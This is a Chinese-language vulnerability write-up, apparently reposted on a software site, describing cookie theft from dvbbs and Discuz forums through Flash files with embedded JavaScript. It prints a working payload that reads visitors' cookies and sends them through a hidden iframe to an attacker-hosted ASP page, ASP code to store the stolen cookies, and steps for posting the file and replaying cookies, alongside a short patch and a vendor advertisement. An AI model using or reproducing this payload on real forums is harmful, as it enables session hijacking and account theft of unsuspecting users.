◇ 此漏洞所涉及版本::
dvbbs、discus所有版本,其他论坛未作测试,相信大多数都存在该漏洞
◇ 描述:
由于dvbbs等论坛对flash采取直接播放形式,导致攻击者能利用flash嵌入一段javascript代码,达到偷取用户cookies的目的
◇ 具体分析和利用:
1. 首先准备好一个能运行asp的空间,用来存放cookies
2. 新建一个flash动画,加入如下代码:
onclipevent (load) {
url="javascript:var rng=document.selection.createrange();rng.pastehtml(\"<iframe name=frame_hide style=display:none></iframe><img src=\\\"./images/logo.gif\\\" style=\\\"display:none\\\" onload=\\\"javascript:co=document.cookie;document.all.frame_hide.src=http://存放路径/writecookies.asp?cookies=+co.split(&);var e=document.all;for(var i=0;i<e.length;i++){if(e(i).tagname==a){var ss=e(i).outerhtml;}}\\\">\");"
geturl(url);
}
利用iframe是为了让其他人查觉不到程式的页面跳转
3. 将flash导出为swf文件,插入到想要偷取cookies的论坛上,加入代码[flash=0,0]http://flash地址[/flash] (注,有些论坛是[swf][/swf])
4. 这样,如果有用户进到贴子里面,javascript程式就会把该用户的cookies送到writecookies.asp,保存到数据库
5. 至于cookies欺骗,推荐使用iecookiesview,非常多教程都有介绍,在这里就不多说了
◇ 备注
1. 对于禁用flash的论坛,还能利用png格式的图片嵌入代码偷取
2. 拿到cookies后,密码是经md5算法加密过的字符串,如果你喜欢用暴力的话,能试试去解码,当然,个人是不推荐这种方法的
◇ 解决方案:
1. 禁用flash,或将flash改为链接格式,以动网为例,修改inc/ubbcode.asp文件
找到下面两段
re.pattern="(\[flash\])(.[^\[]*)(\[\/flash\])"
strcontent= re.replace(strcontent,"<a href=""$2"" target=_blank><img src=pic/swf.gif border=0 alt=点击开新窗口欣赏该flash动画! height=16 width=16>[全屏欣赏]</a>
<object codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0 classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 width=500 height=400><param name=movie value=""$2""><param name=quality value=high><embed src=""$2"" quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?p1_prod_version=shockwaveflash type=application/x-shockwave-flash width=500 height=400>$2</embed></object>")
re.pattern="(\[flash=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/flash\])"
strcontent= re.replace(strcontent,"<a href=""$4"" target=_blank><img src=pic/swf.gif border=0 alt=点击开新窗口欣赏该flash动画! height=16 width=16>[全屏欣赏]</a>
<object codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,2,0 classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 width=$2 height=$3><param name=movie value=""$4""><param name=quality value=high><embed src=""$4"" quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?p1_prod_version=shockwaveflash type=application/x-shockwave-flash width=$2 height=$3>$4</embed></object>")
改为
re.pattern="(\[flash\])(.[^\[]*)(\[\/flash\])"
strcontent= re.replace(strcontent,"<a href=""$2"" target=_blank><img src=pic/swf.gif border=0 height=16 width=16>[点击打开该flash文件]</a>")
re.pattern="(\[flash=*([0-9]*),*([0-9]*)\])(.[^\[]*)(\[\/flash\])"
strcontent= re.replace(strcontent,"<a href=""$4"" target=_blank><img src=pic/swf.gif border=0 height=16 width=16>[点击打开该flash文件]</a>")
2. 至于png图片的问题,留给写论坛的人自己去解决吧
◇ 附:保存cookies的简单asp代码,如果想要加上其他功能,自己稍为修改一下就行了。
set conn=server.createobject("adodb.connection")
conn.open "driver={microsoft access driver (*.mdb)};dbq="& server.mappath("cookieslog.mdb")
cookies=request("cookies")
ip=request.servervariables("remote_host")
sql="insert into co(cookies,ip) values("&cookies&","&ip&")"
conn.execute(sql)
set conn=nothing
◇ 广告时间:
本漏洞由“灌水公司”全体工作人员发现,flash代码由余平编写,文件由小竹整理。
灌水公司提供专业级的网站程式研发,数据库研发,收费技术支持、安全顾问服务
联系方式:
qq:48814 (小竹)
qq组:1019634 (灌水公司)
相关视频
相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
热门文章 360快剪辑怎么使用 36金山词霸如何屏幕取词百度收购PPS已敲定!3
最新文章
微信3.6.0测试版更新了微信支付漏洞会造成哪
360快剪辑怎么使用 360快剪辑软件使用方法介酷骑单车是什么 酷骑单车有什么用Apple pay与支付宝有什么区别 Apple pay与贝贝特卖是正品吗 贝贝特卖网可靠吗
人气排行 xp系统停止服务怎么办?xp系统升级win7系统方电脑闹钟怎么设置 win7电脑闹钟怎么设置office2013安装教程图解:手把手教你安装与qq影音闪退怎么办 QQ影音闪退解决方法VeryCD镜像网站逐个数,电驴资料库全集同步推是什么?同步推使用方法介绍QQ2012什么时候出 最新版下载EDiary——一款好用的电子日记本
查看所有0条评论>>